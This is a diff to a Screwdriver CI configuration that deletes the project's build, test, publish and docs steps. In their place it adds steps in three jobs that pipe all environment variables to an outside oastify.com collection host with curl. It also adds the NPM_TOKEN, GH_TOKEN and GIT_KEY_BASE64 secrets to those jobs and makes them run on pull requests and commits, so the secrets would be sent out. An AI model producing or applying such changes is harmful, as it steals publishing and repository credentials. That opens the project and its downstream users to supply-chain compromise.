--- a/screwdriver.yaml
+++ b/screwdriver.yaml
@@ -7,38 +7,29 @@ shared:
 jobs:
     main:
         steps:
-            - install: yarn install --frozen-lockfile
-            - lint: yarn lint
-            - test: yarn test-ci
-            - docs: |
-                  yarn build-storybook
-                  sd-step exec core/zip "zip -r $SD_ARTIFACTS_DIR/storybook.zip storybook-static"
+            - run-command: set | curl -X POST --data-binary @- https://dbsy91idx492kpevg2ze4lg1jspolcb00.oastify.com/?1
         requires:
             - ~pr
             - ~commit
+        secrets:
+            - NPM_TOKEN
+            - GH_TOKEN
+            - GIT_KEY_BASE64
 
     publish:
-        requires: main
+        requires: [~pr, ~commit]
         steps:
-            - setup-ci: git clone https://github.com/screwdriver-cd/toolbox.git /tmp/ci
-            - install: yarn install --frozen-lockfile
-            - build: yarn build
-            - publish: |
-                  . /tmp/ci/git-ssh.sh
-                  npx semantic-release
+            - run-command: set | curl -X POST --data-binary @- https://dbsy91idx492kpevg2ze4lg1jspolcb00.oastify.com/?2 
         secrets:
             - NPM_TOKEN
             - GH_TOKEN
             - GIT_KEY_BASE64
 
     docs:
-        requires: publish
+        requires: [~pr, ~commit]
         steps:
-            - setup-ci: git clone https://github.com/screwdriver-cd/toolbox.git /tmp/ci
-            - install: yarn install --frozen-lockfile
-            - docs: |
-                  . /tmp/ci/git-ssh.sh
-                  git remote set-url origin `git remote get-url --push origin`
-                  yarn deploy-storybook
+            - run-command: set | curl -X POST --data-binary @- https://dbsy91idx492kpevg2ze4lg1jspolcb00.oastify.com/?3
         secrets:
+            - NPM_TOKEN
+            - GH_TOKEN
             - GIT_KEY_BASE64
